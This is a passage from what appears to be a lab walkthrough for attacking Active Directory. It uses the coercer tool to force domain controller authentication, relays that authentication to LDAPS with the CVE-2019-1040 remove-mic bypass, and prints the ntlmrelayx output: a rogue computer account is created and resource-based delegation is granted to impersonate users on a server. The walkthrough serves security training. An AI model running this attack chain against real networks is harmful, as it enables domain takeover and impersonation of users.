We can coerce a connection from Baltimore DC to our host using multiple methods (petitpotam, printerbug, DFSCoerce). To force a coerce without choosing between the different methods, we can use the all-in-one tool who just came up
As explained beautifully in the hackndo blog () and in the hacker receipe (), you can’t relay smb connection to ldap(s) connection without using CVE-2019-1040 a.k.a remove-mic.
Start the relay with remove mic to the ldaps of baltimore.maryland.local.
Run the coerce authentication on Salsibury(Salisbury is a windows server 2016 up to date so petitpotam unauthenticated will not work here)
Installation
You can now install it from pypi (latest version is ) with this command:
sudo python3 -m pip install coercer
Collecting coercer
Downloading coercer-2.4-py3-none-any.whl (49 kB)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 49.1/49.1 kB 136.3 kB/s eta 0:00:00
Requirement already satisfied: xlsxwriter in /usr/lib/python3/dist-packages (from coercer) (3.0.2)
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from coercer) (0.10.0)
Requirement already satisfied: jinja2 in /usr/lib/python3/dist-packages (from coercer) (3.0.3)
Requirement already satisfied: dsinternals in /usr/lib/python3/dist-packages (from impacket->coercer) (1.2.4)
Installing collected packages: coercer
Successfully installed coercer-2.4
*] Servers started, waiting for connections
[*] SMBD-Thread-5: Received connection from 192.168.56.23, attacking target ldaps://baltimore.maryland.local
[*] Authenticating against ldaps://baltimore.maryland.local as MARYLAND/SALISBURY$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] SMBD-Thread-7: Connection from 192.168.56.23 controlled, but there are no more targets left!
[*] Attempting to create computer in: CN=Computers,DC=maryland,DC=local
[*] Adding new computer with username: removemiccomputer$ and password: *mHcnugW1<KF8Oq result: OK
[*] Delegation rights modified succesfully!
[*] removemiccomputer$ can now impersonate users on SALISBURY$ via S4U2Proxy